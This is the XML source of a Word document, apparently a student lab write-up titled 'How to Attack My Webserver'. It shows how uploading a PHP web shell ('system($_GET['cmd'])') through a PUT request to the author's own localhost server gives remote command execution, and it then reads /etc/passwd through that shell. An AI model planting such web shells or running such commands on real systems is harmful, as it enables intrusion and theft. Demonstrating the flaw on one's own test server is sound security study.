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2E2A" w14:textId="3DA9F115" w:rsidR="00935262" w:rsidRDefault="00371DC5" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>How to Attack My Webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A34D0E9" w14:textId="03B3B856" w:rsidR="00371DC5" w:rsidRDefault="00371DC5" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Start the webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B36222" w14:textId="04FB791B" w:rsidR="00371DC5" w:rsidRDefault="00371DC5" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidR="00250759">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">terminal and navigate to the directory </w:t>
      </w:r>
      <w:r w:rsidR="003B43F9">
        <w:t xml:space="preserve">which houses </w:t>
      </w:r>
      <w:r w:rsidR="00AB7541">
        <w:t>my</w:t>
      </w:r>
      <w:r w:rsidR="003B43F9">
        <w:t xml:space="preserve"> Python webserver code</w:t>
      </w:r>
      <w:r w:rsidR="001850C4">
        <w:t>. Also</w:t>
      </w:r>
      <w:r w:rsidR="00250759">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001850C4">
        <w:t xml:space="preserve"> make sure there is a directory inside the directory </w:t>
      </w:r>
      <w:r w:rsidR="00D14408">
        <w:t>which houses my webserver code named “Resources” as pictured below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D122B" w14:textId="7AB105C3" w:rsidR="003B43F9" w:rsidRDefault="003B43F9" w:rsidP="003B43F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7437138E" wp14:editId="3202080A">
            <wp:extent cx="4374489" cy="2947170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535" w14:textId="37A4BA93" w:rsidR="00371DC5" w:rsidRDefault="00371DC5" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start the webserver with the following command: python HTTP_Server.py 0.0.0.0 </w:t>
      </w:r>
      <w:r w:rsidR="003B43F9">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7978DC0C" w14:textId="75FC4F00" w:rsidR="00371DC5" w:rsidRDefault="00371DC5" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="008727A3">
        <w:t>The webserver code should be run with Python 3. D</w:t>
      </w:r>
      <w:r>
        <w:t>epending on what version of Linux you are using, you many need to specify “python3” instead of just using “python” in the above command</w:t>
      </w:r>
      <w:r w:rsidR="005D166A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317F452" w14:textId="7ED25FCB" w:rsidR="003B43F9" w:rsidRDefault="003B43F9" w:rsidP="003B43F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B1F2FE" wp14:editId="4FFA3E18">
            <wp:extent cx="4396435" cy="296021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94"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4445059" cy="299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9A97" w14:textId="7B9CB3CC" w:rsidR="00371DC5" w:rsidRDefault="00371DC5" w:rsidP="00371DC5"/>
    <w:p w14:paraId="45AA8921" w14:textId="27F3FD7C" w:rsidR="00371DC5" w:rsidRDefault="00371DC5" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open Postman and </w:t>
      </w:r>
      <w:r w:rsidR="003E35F1">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">end </w:t>
      </w:r>
      <w:r w:rsidR="003E35F1">
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>equests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F23B30" w14:textId="695B5CF9" w:rsidR="00371DC5" w:rsidRDefault="00371DC5" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Postman is the software I will be using to send HTTP requests. If you do not have it downloaded, you can download it from the Ubuntu Software app</w:t>
      </w:r>
      <w:r w:rsidR="003E35F1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B7EAA" w14:textId="066D9013" w:rsidR="004838D0" w:rsidRDefault="004838D0" w:rsidP="004838D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="343CDC3B" wp14:editId="0A0D9228">
            <wp:extent cx="5943600" cy="4163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37AB" w14:textId="5EC0C85F" w:rsidR="00371DC5" w:rsidRDefault="005D348B" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Execute</w:t>
      </w:r>
      <w:r w:rsidR="00371DC5">
        <w:t xml:space="preserve"> the following </w:t>
      </w:r>
      <w:r w:rsidR="00CE502F">
        <w:t xml:space="preserve">pictured </w:t>
      </w:r>
      <w:r w:rsidR="0008131A">
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidR="00371DC5">
        <w:t xml:space="preserve"> request. Note that the URL is </w:t>
      </w:r>
      <w:r w:rsidR="00371DC5" w:rsidRPr="00371DC5">
        <w:t>http://localhost:</w:t>
      </w:r>
      <w:r w:rsidR="00504E41">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00371DC5" w:rsidRPr="00371DC5">
        <w:t>000/backdoor.php</w:t>
      </w:r>
      <w:r w:rsidR="00371DC5">
        <w:t xml:space="preserve"> and the body of the request is: </w:t>
      </w:r>
      <w:r w:rsidR="00371DC5" w:rsidRPr="00371DC5">
        <w:t>&lt;?php system($_GET['cmd']);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648DF20C" w14:textId="53DBEA58" w:rsidR="00E33886" w:rsidRDefault="00371DC5" w:rsidP="00E33886">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>This upload</w:t>
      </w:r>
      <w:r w:rsidR="00504E41">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a backdoor to the webserver that will run any command you pass in via a GET request through the cmd parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA1F5D" w14:textId="2C89B1AD" w:rsidR="0037449F" w:rsidRDefault="00AA1680" w:rsidP="00E33886">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If successful, t</w:t>
      </w:r>
      <w:r w:rsidR="0037449F">
        <w:t xml:space="preserve">he webserver returns the contents of the body </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">passed in and returns a </w:t>
      </w:r>
      <w:r w:rsidR="00014C8E">
        <w:t>Content-Location</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r w:rsidR="00014C8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that includes the</w:t>
      </w:r>
      <w:r w:rsidR="00014C8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00951C92">
        <w:t>location</w:t>
      </w:r>
      <w:r w:rsidR="00014C8E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00951C92">
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="00014C8E">
        <w:t xml:space="preserve"> of our file saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B2824" w14:textId="57B6F393" w:rsidR="00E33886" w:rsidRDefault="0037449F" w:rsidP="0037449F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="447B309D" wp14:editId="466961DB">
            <wp:extent cx="5943600" cy="672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38A7" w14:textId="09394574" w:rsidR="00014C8E" w:rsidRDefault="00DA2567" w:rsidP="0037449F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="752A2A49" wp14:editId="6319EA9B">
            <wp:extent cx="5943600" cy="72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3F8" w14:textId="07F9FF3B" w:rsidR="00121DDE" w:rsidRDefault="00371DC5" w:rsidP="00371DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execute the following </w:t>
      </w:r>
      <w:r w:rsidR="005D348B">
        <w:t xml:space="preserve">pictured </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GET request. Note that the URL is </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00504E41" w:rsidRPr="00524DE7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:</w:t>
        </w:r>
        <w:r w:rsidR="00504E41" w:rsidRPr="00524DE7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4000</w:t>
        </w:r>
        <w:r w:rsidR="00504E41" w:rsidRPr="00524DE7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/backdoor.php?cmd=cat%20%2Fetc%2Fpasswd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and that the cmd parameter is set to </w:t>
      </w:r>
      <w:r w:rsidRPr="00371DC5">
        <w:t>cat%20%2Fetc%2Fpasswd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A584651" w14:textId="53033A4D" w:rsidR="00E93445" w:rsidRDefault="00371DC5" w:rsidP="00E93445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">For commands with spaces in them, </w:t>
      </w:r>
      <w:r w:rsidR="00121DDE">
        <w:t xml:space="preserve">I recommend </w:t>
      </w:r>
      <w:r>
        <w:t>URL encod</w:t>
      </w:r>
      <w:r w:rsidR="00121DDE">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> them</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00F57777">
        <w:t xml:space="preserve"> before passing them to the “cmd” parameter </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to ensure the most reliable results. Here is an online tool to </w:t>
      </w:r>
      <w:r w:rsidR="00121DDE">
        <w:t xml:space="preserve">URL encode </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a string if you are interested: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.urlencoder.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B068C70" w14:textId="5DE971E0" w:rsidR="00E93445" w:rsidRDefault="00E93445" w:rsidP="00E93445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05CF12F1" wp14:editId="2280F9E8">
            <wp:extent cx="5943600" cy="674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15B" w14:textId="43E957E0" w:rsidR="00B3321E" w:rsidRDefault="00B3321E" w:rsidP="00E93445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DD01B7" w14:textId="76D7CE72" w:rsidR="00B3321E" w:rsidRDefault="00B3321E" w:rsidP="00B3321E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5017DB22" w14:textId="1E24FF13" w:rsidR="00B3321E" w:rsidRPr="00B3321E" w:rsidRDefault="00B3321E" w:rsidP="00B3321E">
      <w:r>
        <w:t xml:space="preserve">With these steps, I have demonstrated </w:t>
      </w:r>
      <w:r w:rsidR="009A7503">
        <w:t xml:space="preserve">the ability to </w:t>
      </w:r>
      <w:r w:rsidR="00E3471D">
        <w:t xml:space="preserve">remotely </w:t>
      </w:r>
      <w:r w:rsidR="009A7503">
        <w:t>run arbitrary commands on the host my webserver resides</w:t>
      </w:r>
      <w:r w:rsidR="00B61BD2">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="009A7503">
        <w:t xml:space="preserve"> by simply issuing a PUT request followed by a GET request.</w:t>
      </w:r>
      <w:r w:rsidR="00E3471D">
        <w:t xml:space="preserve"> The PUT request in my example </w:t>
      </w:r>
      <w:r w:rsidR="008076DC">
        <w:t>uploads a PHP file that will run any command sen</w:t>
      </w:r>
      <w:r w:rsidR="00C10015">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="008076DC">
        <w:t xml:space="preserve"> in via </w:t>
      </w:r>
      <w:r w:rsidR="00D35EBA">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="008076DC">
        <w:t xml:space="preserve"> GET request </w:t>
      </w:r>
      <w:r w:rsidR="00D35EBA">
        <w:t>parameter ‘cmd’</w:t>
      </w:r>
      <w:r w:rsidR="007F4429">
        <w:t xml:space="preserve"> on the webserver host</w:t>
      </w:r>
      <w:r w:rsidR="00D35EBA">
        <w:t xml:space="preserve">. The GET request then calls </w:t>
      </w:r>
      <w:r w:rsidR="00C10015">
        <w:t>the recently uploaded code</w:t>
      </w:r>
      <w:r w:rsidR="00D35EBA">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00C10015">
        <w:t>passes a command into the ‘cmd’ parameter</w:t>
      </w:r>
      <w:r w:rsidR="00D4669C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B3321E" w:rsidRPr="00B3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7CE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5FA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5A8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A95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80944"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2C6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C5"/>
    <w:rsid w:val="00004448"/>
    <w:rsid w:val="00014C8E"/>
    <w:rsid w:val="0008131A"/>
    <w:rsid w:val="00121DDE"/>
    <w:rsid w:val="001850C4"/>
    <w:rsid w:val="00250759"/>
    <w:rsid w:val="00371DC5"/>
    <w:rsid w:val="0037449F"/>
    <w:rsid w:val="003B43F9"/>
    <w:rsid w:val="003E35F1"/>
    <w:rsid w:val="004838D0"/>
    <w:rsid w:val="00504E41"/>
    <w:rsid w:val="005D166A"/>
    <w:rsid w:val="005D348B"/>
    <w:rsid w:val="007C0FFB"/>
    <w:rsid w:val="007F4429"/>
    <w:rsid w:val="008076DC"/>
    <w:rsid w:val="008727A3"/>
    <w:rsid w:val="00935262"/>
    <w:rsid w:val="00951C92"/>
    <w:rsid w:val="0098512E"/>
    <w:rsid w:val="009A7503"/>
    <w:rsid w:val="00AA1680"/>
    <w:rsid w:val="00AB7541"/>
    <w:rsid w:val="00B3321E"/>
    <w:rsid w:val="00B61BD2"/>
    <w:rsid w:val="00C10015"/>
    <w:rsid w:val="00CE502F"/>
    <w:rsid w:val="00D14408"/>
    <w:rsid w:val="00D35EBA"/>
    <w:rsid w:val="00D4669C"/>
    <w:rsid w:val="00DA2567"/>
    <w:rsid w:val="00E33886"/>
    <w:rsid w:val="00E3471D"/>
    <w:rsid w:val="00E93445"/>
    <w:rsid w:val="00F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5C34"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D9D44275-379F-4300-B67B-22C3DC7F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12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1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000/backdoor.php?cmd=cat%20%2Fetc%2Fpassw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urlencod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D0E7BB3C6C145845E506641EB12FB" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="a04ee471bd27907b13ef60427d018ab9">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="af9884f8-656f-4f79-9e36-6ccd43169a03" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="5160b52f8b5e26eb28b624e5c9efa7e2" ns3:_="">
    <xsd:import namespace="af9884f8-656f-4f79-9e36-6ccd43169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84f8-656f-4f79-9e36-6ccd43169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A401C-00E9-4F4A-86FF-9F8320898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884f8-656f-4f79-9e36-6ccd43169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AE06AF-0CB9-4D98-9B7F-2523BF494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410F7-393E-4845-AE55-44C4AF87C2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33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-19T21:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-19T22:56:00Z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0x010100BBDD0E7BB3C6C145845E506641EB12FB</vt:lpwstr>
  </property>
</Properties>
</file>